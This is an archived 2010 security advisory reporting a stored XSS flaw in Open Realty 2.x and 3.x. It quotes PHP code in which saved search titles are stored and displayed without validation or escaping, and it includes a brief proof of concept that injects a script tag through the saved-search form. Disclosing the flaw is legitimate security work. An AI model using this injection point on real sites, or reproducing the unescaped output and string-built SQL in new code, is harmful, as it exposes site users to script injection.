Open Realty 2.x and 3.x Persistent XSS Vulnerability
Posted on 24 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Open Realty 2.x and 3.x Persistent XSS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Open Realty 2.x and 3.x Persistent XSS Vulnerability ==================================================== # Author: K053 <K053.dev0te3 at gmail> # Date: 2010-7-24 # Hompage: http://open-realty.org # Download Link: http://www.open-realty.org/download.html # Version: 3.x & 2.x < seems all version > ====================================================================================================== Detail : ======== function save_search(){ ... ... // $title contain user supplied serach result name which save in DB without any input validation if ($num_columns == 0) { $sql = "INSERT INTO " . $config['table_prefix'] . "usersavedsearches (userdb_id, usersavedsearches_title, usersavedsearches_query_string, usersavedsearches_last_viewed,usersavedsearches_new_listings,usersavedsearches_notify) VALUES ($userID, $title, $query,now(),0, $notify)"; ... ... } function view_saved_searches() { ... ... else { while (!$recordSet->EOF) { $title = $misc->make_db_unsafe($recordSet->fields['usersavedsearches_title']); if ($title == '') { $title = $lang['saved_search']; } $display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe ($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> <div class="note"><a href="index.php?action=delete_search& searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '" onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />'; $recordSet->MoveNext(); } } }else { $display = $status; } // and no output validation, $display passed immediately return $display; ====================================================================================================== POC : ===== load http://address/index.php?action=save_search < note some parameter set by passed url > in textbox enter <script>alert(0)</scritp>. load http://address/index.php?action=view_saved_searches to view result ______________________________________________________________________________________________________ ~Blackout Frenzy [http://b0f.ir] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
